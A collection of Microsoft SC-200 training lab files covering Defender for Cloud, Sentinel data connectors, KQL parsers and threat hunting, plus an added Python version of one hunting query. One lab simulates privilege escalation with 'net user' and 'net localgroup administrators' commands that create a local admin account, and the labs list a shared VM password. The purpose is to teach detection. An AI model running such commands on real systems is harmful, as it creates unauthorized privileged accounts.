1. On the **Set parameters** blade, enter the following details and select **Save**.

    - Allowed registry or registries regex: []
    - Max allowed CPU units: 200m
    - Max allowed memory bytes: 1

1. Close the *Security policies* page by selecting the 'X' on the upper right of the page to go back to the **Environment settings**.

1. Navigate back to *Regulatory compliance*. To view the recently added standards, select **Show all**.

>**Note:** It can take up to two hours for newly added standards to appear under the Lowest compliance regulatory standard. Please move on to the next step; you can review the standards later.

### Task 2: Explore Workload protection

In this task, you'll review Workload protections.

1. In the left navigation menu, expand the *Cloud Security* section, and select **Workload protections**.

1. In Workload protections, you can see the coverage of your connected resources for the currently selected subscription. Your current resource coverage should be fully covered (100%), which means full protection. Additionally, you can also view the recent security alerts, color-coded by severity.

1. Next, select **Inventory** from the *General* section of Microsoft Defender for Cloud. It shows the number of unmonitored VMs alongside the total covered resources; you should expect to have zero unmonitored VMs. Resources are classified according to their health status.

### Task 3: Mitigate security alerts

In this task, you'll load sample security alerts and review the alert details.

1. Under *General*, select **Security alerts** in the portal menu.

1. Select **Sample alerts** from the command bar. **Hint:** you may need to select the ellipsis (...) button from the command bar.

1. In the Create sample alerts (Preview) pane, make sure your subscription is selected and that all sample alerts are selected in the *Defender for Cloud plans* area.

1. Select **Create sample alerts**.

>**Note:** This sample alert creation process may take a few minutes to complete; wait for the *"Successfully created sample alerts"* notification.

1. Once completed, select **Refresh** (if needed) to see the alerts appear under the *Security alerts* area.

1. Choose an interesting alert with a *Severity* of *High* and perform the following actions:

    - Select the alert checkbox and the alert detail pane should appear. Select **View full details**.

    - Review and read the *Alert details* tab.

    - Select the **Take action** tab or scroll down and select the **Next: Take Action** button at the end of the page.

    - Review the *Take action* information. Notice the sections available to take action depending on the type of alert: Inspect resource context, Mitigate the threat, Prevent future attacks, Trigger automated response and Suppress similar alerts.

## You have completed the lab

-------------------------------------------------------------------------------- /Instructions/Labs/LAB_02_deploy_microsoft_sentinel_content_hub_solution.md: --------------------------------------------------------------------------------

---
lab:
    title: 'Exercise 02: Ingest Windows Security event data'
    module: 'Guided Project - Deploy Microsoft Sentinel Content Hub solutions and data connectors'
---

>**Note**: This lab builds on Lab 01. To complete this lab, you will need an [Azure subscription](https://azure.microsoft.com/free/?azure-portal=true) in which you have administrative access.

## General guidelines

- When creating objects, use the default settings unless there are requirements that require different configurations.
- Only create, delete, or modify objects to achieve the stated requirements. Unnecessary changes to the environment may adversely affect your final score.
- If there are multiple approaches to achieving a goal, always choose the approach that requires the least amount of administrative effort.

We need to configure Microsoft Sentinel to ingest data by using Microsoft Sentinel solutions.

## Architecture diagram

![Diagram of Content Hub data connectors](../Media/apl-5001-lab-diagrams-lab02.png)

## Skilling tasks

You need to deploy Content Hub solutions in the Microsoft Sentinel workspace and meet the following requirements:

- Install the following solutions:
    - Windows Security Events.
    - Azure Activity connector.
    - Microsoft Defender for Cloud.
- Configure the data connector for Azure Activity to apply to all new and existing resources in the subscription.
- Configure the data connector for Microsoft Defender for Cloud to connect to the Azure subscription and ensure that only bi-directional sync is enabled.
- Enable an analytics rule based on the Suspicious number of resource creation or deployment activities template. The rule should run every hour and only look up data for the last hour.
- Ensure that the Azure Activity workbook is available in My workbooks.

## Exercise instructions

>**Note**: In the following tasks, to access `Microsoft Sentinel`, select the `workspace` you created in Lab 01.

### Task 1 - Deploy a Microsoft Sentinel Content Hub solution

Deploy a Content Hub solution and configure Data connectors. Learn more about [Content Hub solutions](https://learn.microsoft.com/azure/sentinel/sentinel-solutions).

1. In `Microsoft Sentinel`, go to the `Content management` menu section and select **Content Hub**.
1. Search for and select **Windows Security Events**.
1. Select the link for **View details**.
1. Select the Windows Security Events plan, and select **Create**.
1. Select the `RG2` resource group that includes the Microsoft Sentinel workspace, and select the `Workspace`.
1. Select **Next** to go to the Data Connectors tab (the solution will deploy 2 data connectors).
1. Select **Next** to go to the Workbooks tab (the solution installs workbooks).
1. Select **Next** to go to the Analytics tab (the solution installs analytics rules).
1. Select **Next** to go to the Hunting queries tab (the solution installs hunting queries).
1. Select **Review + create**.
1. Select **Create**.

1. Repeat these steps for the `Azure Activity` and the `Microsoft Defender for Cloud` solutions.

### Task 2 - Set up the data connector for Azure Activity

Configure the data connector for Azure Activity to apply to all new and existing resources in the subscription. Learn more about [Microsoft Sentinel data connectors](https://learn.microsoft.com/azure/sentinel/connect-data-sources).

1. In `Microsoft Sentinel`, go to the `Content management` menu section and select **Content Hub**.
1. In the `Content hub`, filter `Status` for Installed solutions.
1. Select the `Azure Activity` solution and select **Manage**.
1. Select the `Azure Activity` Data connector and select **Open connector page**.
1. In the `Configuration` area under the `Instructions` tab, scroll down to `2. Connect your subscriptions...`, and select **Launch Azure Policy Assignment Wizard>**.
1. In the **Basics** tab, select the ellipsis button (...) under **Scope**, select your subscription from the drop-down list and click **Select**.
1. Select the **Parameters** tab and choose your workspace from the **Primary Log Analytics workspace** drop-down list.
1. Select the **Remediation** tab and select the **Create a remediation task** checkbox.
1. Select the **Review + Create** button to review the configuration.
1. Select **Create** to finish.

### Task 3 - Set up the Defender for Cloud data connector

Configure the data connector for Microsoft Defender for Cloud and ensure that only incident management is configured.

1. In `Microsoft Sentinel`, go to the `Content management` menu section and select **Content Hub**.
1. In the `Content hub`, filter `Status` for Installed solutions.
1. Select the `Microsoft Defender for Cloud` solution and select **Manage**.
1. Select the `Subscription-based Microsoft Defender for Cloud (Legacy)` Data connector and select **Open connector page**.
1. In the `Configuration` area under the `Instructions` tab, scroll down to your subscription and move the slider in the `Status` column to **Connected**.
1. Make sure `Bi-directional sync` is **Enabled**.

### Task 4 - Create an analytics rule

Create an analytics rule based on the Suspicious number of resource creation or deployment activities template. The rule should run every hour and only look up data for the last hour. Learn more about [Using Microsoft Sentinel Analytic rule templates](https://learn.microsoft.com/azure/sentinel/detect-threats-built-in).

1. In `Microsoft Sentinel`, go to the `Configuration` menu section and select **Analytics**.
1. In the `Rule templates` tab, search for **Suspicious number of resource creation or deployment activities**.
1. Select **Suspicious number of resource creation or deployment activities**, and select **Create rule**.
1. Leave the defaults on the `General` tab and select **Next: Set rule logic >**.
1. Leave the default `Rule query` and configure `Query scheduling` using the table:

|Setting |Value|
|---|---|
|Run query every|1 Hours|
|Lookup data from the last|1 Hours|

1. Select **Next: Incident settings >**.
1. Leave the defaults and select **Next: Automated response >**.
1. Leave the defaults and select **Next: Review and create >**.
1. Select **Save**.

### Task 5 - Ensure that the Azure Activity workbook is available in My workbooks

1. In `Microsoft Sentinel`, go to the `Content management` menu section and select **Content Hub**.
1. In the `Content hub`, filter `Status` for Installed solutions.
1. Select the `Azure Activity` solution and select **Manage**.
1. Select the `Azure Activity` workbook `checkbox`, and then select **Configuration**.
1. Select the `Azure Activity` workbook and select **Save**.
1. Choose the `Azure Region` for your `Microsoft Sentinel` workspace.

-------------------------------------------------------------------------------- /Allfiles/SC200_module7_ASIM_Parser_scripts.txt: --------------------------------------------------------------------------------

This file contains KQL ASIM parser scripts used in the course SC-200: Security Operations Analyst associate.

# Module 7 - Lab 1 - Exercise 9 - Create ASIM parsers

**Task 1 Script**

```KQL
let RegistryType = datatable (TypeCode: string, TypeName: string) [
    "None", "Reg_None",
    "String", "Reg_Sz",
    "ExpandString", "Reg_Expand_Sz",
    "Binary", "Reg_Binary",
    "Dword", "Reg_DWord",
    "MultiString", "Reg_Multi_Sz",
    "QWord", "Reg_QWord"
];
let RegistryEvents_M365D=() {
    DeviceRegistryEvents
    | extend
        // Event
        EventOriginalUid = tostring(ReportId),
        EventCount = int(1),
        EventProduct = 'M365 Defender for Endpoint',
        EventVendor = 'Microsoft',
        EventSchemaVersion = '0.1.0',
        EventStartTime = TimeGenerated,
        EventEndTime = TimeGenerated,
        EventType = ActionType,
        // Registry
        RegistryKey = iff (ActionType in ("RegistryKeyDeleted", "RegistryValueDeleted"), PreviousRegistryKey, RegistryKey),
        RegistryValue = iff (ActionType == "RegistryValueDeleted", PreviousRegistryValueName,
        RegistryValueName),
        // RegistryValueType -- original name is fine
        // RegistryValueData -- original name is fine
        RegistryKeyModified = iff (ActionType == "RegistryKeyRenamed", PreviousRegistryKey, ""),
        RegistryValueModified = iff (ActionType == "RegistryValueSet", PreviousRegistryValueName, ""),
        // RegistryValueTypeModified -- Not provided by Defender
        RegistryValueDataModified = PreviousRegistryValueData
    | lookup RegistryType on $left.RegistryValueType == $right.TypeCode
    | extend RegistryValueType = TypeName
    | project-away
        TypeName,
        PreviousRegistryKey,
        PreviousRegistryValueName,
        PreviousRegistryValueData
    // Device
    | extend
        DvcHostname = DeviceName,
        DvcId = DeviceId,
        Dvc = DeviceName
    // Users
    | extend
        ActorUsername = iff (InitiatingProcessAccountDomain == '', InitiatingProcessAccountName, strcat(InitiatingProcessAccountDomain, '\\', InitiatingProcessAccountName)),
        ActorUsernameType = iff(InitiatingProcessAccountDomain == '', 'Simple', 'Windows'),
        ActorUserIdType = 'SID'
    | project-away InitiatingProcessAccountDomain, InitiatingProcessAccountName
    | project-rename
        ActorUserId = InitiatingProcessAccountSid,
        ActorUserAadId = InitiatingProcessAccountObjectId,
        ActorUserUpn = InitiatingProcessAccountUpn
    // Processes
    | extend
        ActingProcessId = tostring(InitiatingProcessId),
        ParentProcessId = tostring(InitiatingProcessParentId)
    | project-away InitiatingProcessId, InitiatingProcessParentId
    | project-rename
        ParentProcessName = InitiatingProcessParentFileName,
        ParentProcessCreationTime = InitiatingProcessParentCreationTime,
        ActingProcessName = InitiatingProcessFolderPath,
        ActingProcessFileName = InitiatingProcessFileName,
        ActingProcessCommandLine = InitiatingProcessCommandLine,
        ActingProcessMD5 = InitiatingProcessMD5,
        ActingProcessSHA1 = InitiatingProcessSHA1, //OK
        ActingProcessSHA256 = InitiatingProcessSHA256,
        ActingProcessIntegrityLevel = InitiatingProcessIntegrityLevel,
        ActingProcessTokenElevation = InitiatingProcessTokenElevation,
        ActingProcessCreationTime = InitiatingProcessCreationTime
    // -- aliases
    | extend
        Username = ActorUsername,
        UserId = ActorUserId,
        UserIdType = ActorUserIdType,
        User = ActorUsername,
        CommandLine = ActingProcessCommandLine,
        Process = ActingProcessName
};
RegistryEvents_M365D
```

**Task 2 Script**

```KQL
let RegistryType = datatable (TypeCode: string, TypeName: string) [
    "%%1872", "Reg_None",
    "%%1873", "Reg_Sz",
    "%%1874", "Reg_Expand_Sz",
    "%%1875", "Reg_Binary",
    "%%1876", "Reg_DWord",
    "%%1879", "Reg_Multi_Sz",
    "%%1883", "Reg_QWord"
];
let RegistryAction = datatable (EventOriginalSubType: string, EventType: string) [
    "%%1904", "RegistryValueSet",
    "%%1905", "RegistryValueSet",
    "%%1906", "RegistryValueDeleted"
];
let Hives = datatable (KeyPrefix: string, Hive: string) [
    "MACHINE", "HKEY_LOCAL_MACHINE",
    "USER", "HKEY_USERS"
];
let RegistryEvents=() {
    SecurityEvent
    // -- Filter
    | where EventID == 4657
    // Event
    | extend
        EventCount = int(1),
        EventVendor = 'Microsoft',
        EventProduct = 'Security Events',
        EventSchemaVersion = '0.1.0',
        EventStartTime = todatetime(TimeGenerated),
        EventEndTime = todatetime(TimeGenerated),
        EventOriginalType = tostring(EventID)
    | project-rename
        EventOriginalSubType = OperationType,
        EventOriginalUid = EventOriginId
    | lookup RegistryAction on EventOriginalSubType
    // Registry
    // Normalize key hive
    | parse ObjectName with "\\REGISTRY\\" KeyPrefix "\\" Key
    | lookup Hives on KeyPrefix
    | extend RegistryKey = strcat (Hive, "\\", Key)
    | project-away Hive, Key,
        KeyPrefix, ObjectName
    | project-rename
        RegistryValue = ObjectValueName
    | extend
        RegistryValueData = iff (EventOriginalSubType == "%%1906", OldValue, NewValue),
        RegistryKeyModified = iff (EventOriginalSubType == "%%1905", RegistryKey, ""),
        RegistryValueModified = iff (EventOriginalSubType == "%%1905", RegistryValue, ""),
        RegistryValueDataModified = iff (EventOriginalSubType == "%%1905", OldValue, "")
    | lookup RegistryType on $left.NewValueType == $right.TypeCode
    | project-rename RegistryValueType = TypeName
    | lookup RegistryType on $left.OldValueType == $right.TypeCode
    | project-rename RegistryValueTypeModified = TypeName
    | project-away OldValue, NewValue, OldValueType, NewValueType
    // Device
    | extend
        DvcId = SourceComputerId,
        DvcHostname = Computer,
        DvcOs = 'Windows'
    // User
    | project-rename
        ActorUserId = SubjectUserSid,
        ActorSessionId = SubjectLogonId,
        ActorDomainName = SubjectDomainName
    | extend
        ActorUserIdType = 'SID',
        ActorUsername = iff (ActorDomainName == '-', SubjectUserName, SubjectAccount),
        ActorUsernameType = iff(ActorDomainName == '-', 'Simple', 'Windows'),
        ActingProcessId = tostring(toint(ProcessId))
    // Process
    | project-rename
        ActingProcessName = ProcessName
    // -- Aliases
    | extend
        User = ActorUsername,
        UserId = ActorUserId,
        Dvc = DvcHostname,
        Process = ActingProcessName
    // -- Remove potentially confusing
    | project-away
        SubjectUserName,
        SubjectAccount
};
RegistryEvents
```

-------------------------------------------------------------------------------- /Instructions/Demos/Ignite_2024_Lab_452-06.md: --------------------------------------------------------------------------------

---
lab:
    title: 'Exercise 06: Perform Threat Hunting in Microsoft Sentinel'
    module: 'Guided Project - Create detections and perform investigations using Microsoft Sentinel'
---

## Exercise overview

You're a Security Operations Analyst working at a company that implemented Microsoft Sentinel. You must learn how to detect and mitigate threats using Microsoft Sentinel. After connecting your data sources to Microsoft Sentinel, you create custom analytics rules to help discover threats and anomalous behaviors in your environment.

Threat hunting queries enable and empower SOC analysts to proactively monitor and investigate potential attacks as they are developing or before they happen. Hunting within Microsoft Sentinel allows queries that are similar to analytics rules to be used to audit the environment for potentially malicious activities, while allowing analysts to escalate results to incidents if needed. Sometimes, hunting threats may require data that goes beyond the retention of the analytics (hot) tier; this is where features like Search/Restore jobs can be used to ensure that the SOC has the data it needs.

## Exercise instructions

### Task 1: Perform a simulated privilege escalation attack

In this task, you will perform a simulated attack on the VM1 Azure virtual machine.

1. In the Edge browser, navigate to the Azure portal at .

1. Type **Virtual machines** in the search bar and select **Virtual machines**.

1. Select the **VM1** virtual machine.

1. In the left navigation menu, expand the **Operations** section and select **Run command**.

1. In the **Run command** pane, select **RunPowerShellScript**.

1. In the **PowerShell script** box, clear any previous commands, then copy and run these commands to simulate the creation of an Admin account. Remember to press Enter after the last row:

```CommandPrompt
net user theusernametoadd /add
net user theusernametoadd ThePassword1!
net localgroup administrators theusernametoadd /add
```

1. Monitor the *Output* section to verify the commands completed successfully.

### Task 2: Create KQL hunting queries

In this task, you will create a hunting query and bookmark a result.

1. Log in to the WIN1 virtual machine as Admin with the password: **Pa55w.rd**.

1. In the Edge browser, navigate to the Azure portal at .

1. In the **Sign in** dialog box, copy and paste in the **Tenant Email** account provided by your lab hosting provider and then select **Next**.

1. In the **Enter password** dialog box, copy and paste in the **Tenant Password** provided by your lab hosting provider and then select **Sign in**.

1. In the Search bar of the Azure portal, type *Sentinel*, then select **Microsoft Sentinel**.

1. Select your Microsoft Sentinel Workspace.

1. Select **Logs**.

1. Enter and *Run* the following KQL statement in the *New Query 1* space:

>**Important:** You may want to paste the KQL queries into Notepad first, and then copy from there to the *New Query 1* Log window to avoid any errors.

```KQL
search "administrators"
| summarize count() by $table
```

>**Note:** A result with the event might take up to 5 minutes to appear. Wait until it does.

1. The result might show events from different tables, but in our case, we want to investigate the SecurityEvent table. The EventID and Event that we are looking for is "4732 - A member was added to a security-enabled local group". With this, we will identify the addition of a member to a privileged group. **Run** the following KQL query to confirm:

```KQL
SecurityEvent
| where EventID == 4732
| where TargetAccount == "Builtin\\Administrators"
```

1. Expand the row to see all the columns related to the record. The username of the account added as Administrator does not show.
The issue is that instead of storing the username, the record stores the Security Identifier (SID). **Run** the following KQL to match the SID to the username that was added to the Administrators group:

```KQL
SecurityEvent
| where EventID == 4732
| where TargetAccount == "Builtin\\Administrators"
| extend Acct = MemberSid, MachId = SourceComputerId
| join kind=leftouter (
    SecurityEvent
    | summarize count() by TargetSid, SourceComputerId, TargetUserName
    | project Acct1 = TargetSid, MachId1 = SourceComputerId, UserName1 = TargetUserName) on $left.MachId == $right.MachId1, $left.Acct == $right.Acct1
```

1. Expand the row to show the resulting columns; in the last one, we see the name of the added user under the *UserName1* column we *project* within the KQL query. It is important to help the Security Operations Analyst by providing as much context about the alert as you can. This includes projecting Entities for use in the investigation graph. **Run** the following query:

```KQL
SecurityEvent
| where EventID == 4732
| where TargetAccount == "Builtin\\Administrators"
| extend Acct = MemberSid, MachId = SourceComputerId
| join kind=leftouter (
    SecurityEvent
    | summarize count() by TargetSid, SourceComputerId, TargetUserName
    | project Acct1 = TargetSid, MachId1 = SourceComputerId, UserName1 = TargetUserName) on $left.MachId == $right.MachId1, $left.Acct == $right.Acct1
| extend timestamp = TimeGenerated, HostCustomEntity = Computer, AccountCustomEntity = UserName1
```

1. Now that you have a good detection rule, in the Logs window, select **+ New alert rule** in the command bar and then select **Create Microsoft Sentinel alert**. **Hint:** You might need to select the ellipsis (...) button in the command bar.

1. This starts the "Analytics rule wizard".
For the *General* tab, type:

|Setting|Value|
|---|---|
|Name|**SecurityEvent Local Administrators User Add**|
|Description|**User added to Local Administrators group**|
|Tactics|**Privilege Escalation**|
|Severity|**High**|

1. Select the **Next: Set rule logic >** button.

1. On the *Set rule logic* tab, the *Rule query* should already be populated with your KQL query, as well as the entities under *Alert enhancement - Entity mapping*.

|Entity|Identifier|Data Field|
|:----|:----|:----|
|Account|FullName|AccountCustomEntity|
|Host|Hostname|HostCustomEntity|

1. If **Hostname** isn't selected for the *Host* Entity, select it from the drop-down list and use the parameters in the preceding table to populate the fields.

1. For *Query scheduling*, set the following:

|Setting|Value|
|---|---|
|Run Query every|5 minutes|
|Lookup data from the last|1 Days|

>**Note:** We are purposely generating many incidents for the same data. This enables the Lab to use these alerts.

1. Leave the rest of the options with the defaults. Select the **Next: Incident settings >** button.

1. For the *Incident settings* tab, leave the default values and select the **Next: Automated response >** button.

1. On the *Automated response* tab, select the **Next: Review and create >** button.

1. On the *Review and create* tab, select the **Create** button to create the new Scheduled Analytics rule.
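The SID-to-username join from Task 2, re-implemented offline in Python as an added example that is not part of the original lab: it runs the same logic (EventID 4732 into Builtin\Administrators, left-outer joined to the TargetSid/TargetUserName pairs harvested from other SecurityEvent rows on the same computer) over constructed records, and also covers two cases the portal run does not show, a 4732 into a non-privileged group and a member SID with no matching name. All SIDs, computer ids and timestamps are made up.

```python
"""Offline re-implementation of the lab's 4732 hunting query (added example)."""

# Constructed SecurityEvent-like rows; only the columns the lab's query touches.
SAMPLE_EVENTS = [
    # 4720 (user account created) on VM1: TargetSid/TargetUserName pair the new
    # account's SID with its name. This is what the lab's subquery harvests.
    {"TimeGenerated": "2024-11-19T10:00:01Z", "EventID": 4720, "Computer": "VM1",
     "SourceComputerId": "vm1-guid", "TargetAccount": "", "MemberSid": "",
     "TargetSid": "S-1-5-21-111-1001", "TargetUserName": "theusernametoadd"},
    # 4732 on VM1: the member added to Builtin\Administrators is recorded only as
    # MemberSid; TargetSid/TargetUserName describe the group, not the member.
    {"TimeGenerated": "2024-11-19T10:00:02Z", "EventID": 4732, "Computer": "VM1",
     "SourceComputerId": "vm1-guid", "TargetAccount": "Builtin\\Administrators",
     "MemberSid": "S-1-5-21-111-1001", "TargetSid": "S-1-5-32-544",
     "TargetUserName": "Administrators"},
    # 4732 into a non-privileged group: the TargetAccount filter drops it.
    {"TimeGenerated": "2024-11-19T10:00:03Z", "EventID": 4732, "Computer": "VM1",
     "SourceComputerId": "vm1-guid", "TargetAccount": "Builtin\\Users",
     "MemberSid": "S-1-5-21-111-1002", "TargetSid": "S-1-5-32-545",
     "TargetUserName": "Users"},
    # 4732 on VM2 whose MemberSid never appears as a TargetSid: kind=leftouter
    # keeps the detection with an empty UserName1 instead of dropping it.
    {"TimeGenerated": "2024-11-19T10:00:04Z", "EventID": 4732, "Computer": "VM2",
     "SourceComputerId": "vm2-guid", "TargetAccount": "Builtin\\Administrators",
     "MemberSid": "S-1-5-21-222-1003", "TargetSid": "S-1-5-32-544",
     "TargetUserName": "Administrators"},
]


def sid_name_lookup(events):
    """Equivalent of the lab's subquery
    (summarize count() by TargetSid, SourceComputerId, TargetUserName):
    distinct names seen for each (SourceComputerId, TargetSid) pair."""
    lookup = {}
    for e in events:
        sid = e.get("TargetSid")
        if not sid:
            continue
        names = lookup.setdefault((e["SourceComputerId"], sid), [])
        if e["TargetUserName"] not in names:
            names.append(e["TargetUserName"])
    return lookup


def local_admin_additions(events):
    """The lab's final query: filter 4732 into Builtin\\Administrators, join the
    member SID to a name on the same computer (leftouter, so unmatched rows stay),
    and emit the entity columns the analytics rule maps."""
    lookup = sid_name_lookup(events)
    results = []
    for e in events:
        if e["EventID"] != 4732 or e["TargetAccount"] != "Builtin\\Administrators":
            continue
        key = (e["SourceComputerId"], e["MemberSid"])
        # leftouter semantics: no match yields a single row with an empty name
        for user_name in lookup.get(key, [""]):
            results.append({
                "timestamp": e["TimeGenerated"],
                "HostCustomEntity": e["Computer"],   # Computer
                "MemberSid": e["MemberSid"],
                "UserName1": user_name,
                "AccountCustomEntity": user_name,    # UserName1
            })
    return results


if __name__ == "__main__":
    for row in local_admin_additions(SAMPLE_EVENTS):
        print(row)
```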
-------------------------------------------------------------------------------- /Instructions/Demos/Ignite_2024_Lab_455-03.md: --------------------------------------------------------------------------------

---
lab:
    title: 'Exercise 3 - Mitigate threats using Microsoft Defender for Cloud'
    module: 'Explore Secure Score, Recommendations and Inventory'
---

# Exercise 3 - Explore Secure Score, Recommendations and Inventory

## Lab scenario

Previously, we briefly explored the *Secure score* tile on the overview page. Now let's dive into this capability and the associated recommendations. Microsoft Defender for Cloud continually assesses your resources. All findings are aggregated into a single score (Secure score), which measures the current security posture of your subscription; the higher the score, the lower the identified risk level.

### Task 1: Exploring Security Controls and Recommendations

1. In the Microsoft Defender for Cloud left navigation menu, under the General section, select Recommendations.

1. On the Recommendations page, select the **Switch to classic view** link from the top menu. Notice the first part of the page, the summary view, which includes the current *Secure score*, progress on the recommendations (both completed security controls and recommendations) and resource health (by severity).

1. On the top menu, select the **Download CSV report** button. This allows you to get a snapshot of your resources, their health status, and the associated recommendations. You can use it for pivoting and reporting.

1. Select a Recommendation from the drop-down list to review the format, such as *Storage account public access should be disallowed*.

>**Note:** If that recommendation is not available in the lab environment, select one that is available.

1. On the top section, notice the following:

    - Title of the recommendation: Storage account public access should be disallowed
    - Top menu controls: Exempt, Deny, View policy definition and Open query
    - Severity indicator: Medium
    - Freshness interval: 30 Min
    - Tactics and techniques: Initial Access

1. The next important part is the Remediation Steps, which contains the remediation logic where you can remediate the selected resource(s).

>**Info:** In the recommendation list, you can now see some recommendations flagged as in preview. They aren't included in the calculation of your score. They should still be remediated so that when the preview period ends, they will contribute towards your final score.

### Task 2: Exploring the Inventory capability

The *Asset inventory* dashboard allows you to get a single-pane-of-glass view of all your resources covered by Microsoft Defender for Cloud. It also provides per-resource visibility into all of Microsoft Defender for Cloud's information and additional resource details, including security posture and protection status. Since this dashboard is based on Azure Resource Graph (ARG), you can run queries across subscriptions at large scale, quickly and easily.

1. From the left navigation menu, under the General section, select **Inventory**.

1. In your environment, these numbers may not be the same, since they vary over time.

1. Notice the total number of resources. The total number of resources are the ones that are connected to Microsoft Defender for Cloud and NOT the total number of resources that you have in your subscriptions.

1. Notice the number of unhealthy resources. The unhealthy resources are the resources with actionable recommendations based on the selected filter.

1. Use the Filter by name box to search for **virtual**.
You should now see a filtered view containing your desired resource, *VM1*, and a few other resources like virtual networks and subnets. Hover over the red bar in the recommendations column to see a tooltip with the active recommendations. You should expect to see Active-xx of xx Recommendations; these are the active recommendations you must attend to.

1. Open the resource health pane by selecting the resource. Select *VM1*.

1. On the resource health pane for *VM1*, review the virtual machine information alongside the recommendation list.

>**Note:** It could take up to 24 hours for all the recommendations to show up, and it is possible that during lab time they may not show up, which is sometimes the case. If you don't see the data in recommendations, you can continue to the next exercise and verify this later.

1. From the filter pane, remove the Resource type filter, then select **Add filter** and notice the Security findings filter. It allows you to find all resources that are prone to a specific vulnerability. You can also search for CVE, KB ID, name, and missing update.

> | Security Finding value | What it represents |
> | :--- | :--- |
> | CVE | Common vulnerabilities and exposures |
> | KB | Knowledge Base - usually patches |
> | ID | Defender for Cloud internal specific issues |

1. From the filter pane, remove the Security findings filter you added in the previous step, then from the top menu, select **Open query**.

1. On the **Azure Resource Graph Explorer** blade, select **Run Query**. You should now have the same list of resources and columns as in the previous step. This query is editable for your needs, and here it gets very powerful.

1. Save the query for later use by selecting **Save as** from the top menu. You can use it to create periodic reports. Name the report asc-filtered-query and select Save.
### Task 3: Understanding pricing

The pricing criteria depend on the plan you enable. In addition, as part of Foundational CSPM (free), you get several items like Secure Score, Asset Inventory, Security Recommendations, etc.

Refer to the following to learn more about Defender for Cloud pricing:

- [Pricing Page](https://azure.microsoft.com/pricing/details/defender-for-cloud/?v=17.23h)
- [Foundational CSPM vs. Defender CSPM capabilities](https://learn.microsoft.com/azure/defender-for-cloud/concept-cloud-security-posture-management)

1. From the Microsoft Defender for Cloud navigation menu, select **Workbooks** and select the **Public Templates** tab. Next, select the **Cost Estimation** workbook.
1. In the *Cost Estimation* workbook, you can observe the estimated pricing for the resources in both Defender plans for Azure.

### Task 4: Overview of CWP capabilities

1. Navigate to **Workload protections** from the Cloud Security section of the Microsoft Defender for Cloud menu to view the Workload Protections Dashboard.

The dashboard includes the following sections:

- Microsoft Defender for Cloud coverage (1) - Here you can see the resource types that are in your subscription and eligible for protection by Defender for Cloud. Wherever relevant, you can upgrade here as well. If you want to upgrade all possible eligible resources, select Upgrade All.
- Security alerts (2) - When Defender for Cloud detects a threat in any area of your environment, it generates an alert. These alerts describe details of the affected resources, suggested remediation steps, and in some cases an option to trigger a logic app in response. Selecting anywhere in this graph opens the Security Alerts page.
105 | - Advanced protection (3) - Defender for Cloud includes many advanced threat protection capabilities for virtual machines, SQL databases, containers, web applications, your network, and more. In this advanced protection section, you can see the status of the resources in your selected subscriptions for each of these protections. Select any of them to go directly to the configuration area for that protection type. 106 | - Insights (4) - This rolling pane of news, suggested reading and high-priority alerts give Defender for Cloud insights into pressing security matters that are relevant to you and your subscription. Whether it's a list of high-severity CVEs discovered on your VMs by a vulnerability analysis tool, or a new blog post by a member of the Defender for Cloud team, you'll find it here in the Insights panel. 107 | 108 | ## You have completed the lab 109 | -------------------------------------------------------------------------------- /Allfiles/SC200_module4_KQL_scripts.txt: -------------------------------------------------------------------------------- 1 | This file contains KQL scripts used in the course SC-200: Security Operations Analyst associate, Module 4 - 2 | 3 | 4 | # Module 4 - Lab 1 - Exercise 1 - Create queries for Microsoft Sentinel using Kusto Query Language (KQL) 5 | 6 | ## Lab scenario 7 | You are a Security Operations Analyst working at a company that is implementing Microsoft Sentinel. You are responsible for performing log data analysis to search for malicious activity, display visualizations, and perform threat hunting. To query log data, you use the Kusto Query Language (KQL). 8 | 9 | >**Hint:** This lab involves entering many KQL scripts into Microsoft Sentinel. The scripts were provided in a file at the beginning of this lab. An alternate location to download them is: https://github.com/MicrosoftLearning/SC-200T00A-Microsoft-Security-Operations-Analyst/tree/master/Allfiles 10 | 11 | 12 | ### Task 1: Access the KQL testing area. 

In this task, you will access a Log Analytics environment where you can practice writing KQL statements.

1. Log in to the WIN1 virtual machine as Admin with the password: **Pa55w.rd**.

2. Go to https://aka.ms/lademo in your browser. Log in with the MOD Administrator credentials.

3. Explore the available tables listed in the tab on the left side of the screen.

4. In the query editor, enter the following query and select the **Run** button. You should see the query results in the bottom window.

```KQL
SecurityEvent
```

5. Notice that you have reached the maximum number of results (30,000).

6. Change the *Time range* to **Last 30 minutes** in the Query Window.

7. Next to the first record, select the **>** to expand the information for the row.


### Task 2: Run Basic KQL Statements

In this task, you will build basic KQL statements.

>**Important:** For each query, clear the previous statement from the Query Window or open a new Query Window by selecting **+** after the last opened tab (up to 25).

1. The following statement demonstrates the **search** operator, which searches all columns in the table for the value. In the Query Window, enter the following statement and select **Run**:

```KQL
search "location"
```

2. The following statement demonstrates searching across the tables listed in the **in** clause. Enter the following statement and select **Run**:

```KQL
search in (SecurityEvent,App*) "new"
```

3. Change the *Time range* back to **Last 24 hours** in the Query Window.

4. The following statements demonstrate the **where** operator. In the Query Window, enter the following statements and select **Run**:

>**Important:** You should select **Run** after entering the query from each code block below.

```KQL
SecurityEvent
| where TimeGenerated > ago(1h)
```

```KQL
SecurityEvent
| where TimeGenerated > ago(1h) and EventID == "4624"
```

```KQL
SecurityEvent
| where TimeGenerated > ago(1h)
| where EventID == 4624
| where AccountType =~ "user"
```

```KQL
SecurityEvent
| where TimeGenerated > ago(1h) and EventID in (4624, 4625)
```

5. The following statement demonstrates the use of the **let** statement to declare variables. In the Query Window, enter the following statement and select **Run**:

```KQL
let timeOffset = 1h;
let discardEventId = 4688;
SecurityEvent
| where TimeGenerated > ago(timeOffset*2) and TimeGenerated < ago(timeOffset)
| where EventID != discardEventId
```

6. The following statement demonstrates the use of the **let** statement to declare a dynamic list (here a `datatable` of suspicious accounts to match against). In the Query Window, enter the following statement and select **Run**:

```KQL
let suspiciousAccounts = datatable(account: string) [
    @"NA\timadmin",
    @"NT AUTHORITY\SYSTEM"
];
SecurityEvent
| where TimeGenerated > ago(1h)
| where Account in (suspiciousAccounts)
```

>**Tip:** You can re-format the query easily by selecting the ellipsis (...) in the Query Window and selecting **Format query**.

7. The following statement demonstrates the use of the **let** statement to declare a dynamic table. In the Query Window, enter the following statement and select **Run**:

```KQL
let LowActivityAccounts =
    SecurityEvent
    | summarize cnt = count() by Account
    | where cnt < 1000;
LowActivityAccounts | where Account contains "sql"
```

8. Change the **Time range** to **Last hour** in the Query Window. This will limit our results for the following statements.

9. The following statement demonstrates creating fields using the **extend** operator. In the Query Window, enter the following statement and select **Run**:

```KQL
SecurityEvent
